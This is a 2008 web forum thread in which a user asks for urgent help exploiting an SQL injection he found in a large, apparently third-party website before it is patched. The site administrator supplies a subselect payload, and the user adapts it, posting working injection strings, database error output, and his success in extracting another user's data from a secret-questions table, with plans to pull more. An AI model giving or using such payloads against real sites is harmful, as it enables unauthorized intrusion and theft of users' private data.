 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
SQL Injection, help, ASAP |
 |
 Posted: Mon May 26, 2008 3:11 pm |
 |
|
| Oilik |
| Active user |
 |
|
| Joined: Mar 05, 2008 |
| Posts: 35 |
|
|
|
 |
|
 |
|
Hello,
I found a potential SQL injection in an extremely popular large site. When I inject code in it, I get:
| Quote: |
result = 20276
An Error Was Encountered
Error Number:
ERROR: syntax error at or near "' ; --'" LINE 2: VALUES ('48753', '5','blah' ' ; --') ^
INSERT INTO users_secret_questions (user_id, question_id, answer) VALUES ('48753', '5','blah' ' ; --')
|
Please help ASAP, seeing this most likely will be patched within an hour!
It's using PHP, so no stacked commands. Is there anything I can do? |
|
|
|
|
|
Re: SQL Injection, help, ASAP |
|
| Posted: Mon May 26, 2008 3:27 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Oilik wrote: | Hello,
I found a potential SQL injection in an extremely popular large site. When I inject code in it, I get:
| Quote: |
result = 20276
An Error Was Encountered
Error Number:
ERROR: syntax error at or near "' ; --'" LINE 2: VALUES ('48753', '5','blah' ' ; --') ^
INSERT INTO users_secret_questions (user_id, question_id, answer) VALUES ('48753', '5','blah' ' ; --')
|
Please help ASAP, seeing this most likely will be patched within an hour!
It's using PHP, so no stacked commands. Is there anything I can do? |
Is it mysql, right? If it's >= 4.1, then maybe you can use subselects.
Something like this:
| Code: |
0'+(SELECT COUNT(*) FROM mysql.user)/*
|
Can you see "answer" after you inserted it do database. If so, then visual feedback is OK. If no, then blind injection may be needed. |
|
Last edited by waraxe on Mon May 26, 2008 3:28 pm; edited 1 time in total |
|
|
|
|
Re: SQL Injection, help, ASAP |
|
| Posted: Mon May 26, 2008 3:28 pm |
|
|
| Oilik |
| Active user |
|
|
| Joined: Mar 05, 2008 |
| Posts: 35 |
|
|
|
|
|
|
|
edit: still exists,
but when I try that, I get
| Quote: |
ERROR: unterminated /* comment at or near "/* ') " LINE 2: ...ES ('48767', '1','0'+(SELECT COUNT(*) FROM mysql.user)/* ') ^ |
thanks! |
|
|
|
|
|
|
|
|
| Posted: Mon May 26, 2008 3:40 pm |
|
|
| Oilik |
| Active user |
|
|
| Joined: Mar 05, 2008 |
| Posts: 35 |
|
|
|
|
|
|
|
sry for the double post, but I tried
| Code: |
0'+(SELECT COUNT(*) FROM mysql.user));--
|
and got
| Code: |
An Error Was Encountered
Error Number:
ERROR: schema "mysql" does not exist
INSERT INTO users_secret_questions (user_id, question_id, answer) VALUES ('48772', '1','0'+(SELECT COUNT(*) FROM mysql.user));--')
|
please help, i'll share the ownage with you at the end :p
Edit:
I used | Code: |
0'+(SELECT user_id FROM users_secret_questions WHERE answer = 'hello' LIMIT 1));-- |
and I went in to check the plaintext of the security question. I got the first of users_secret_questions user's ID as my ASQ! I'm working on retrieveing better data right now.
Thanks waraxe!!! |
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 62
Members: 0
Total: 62
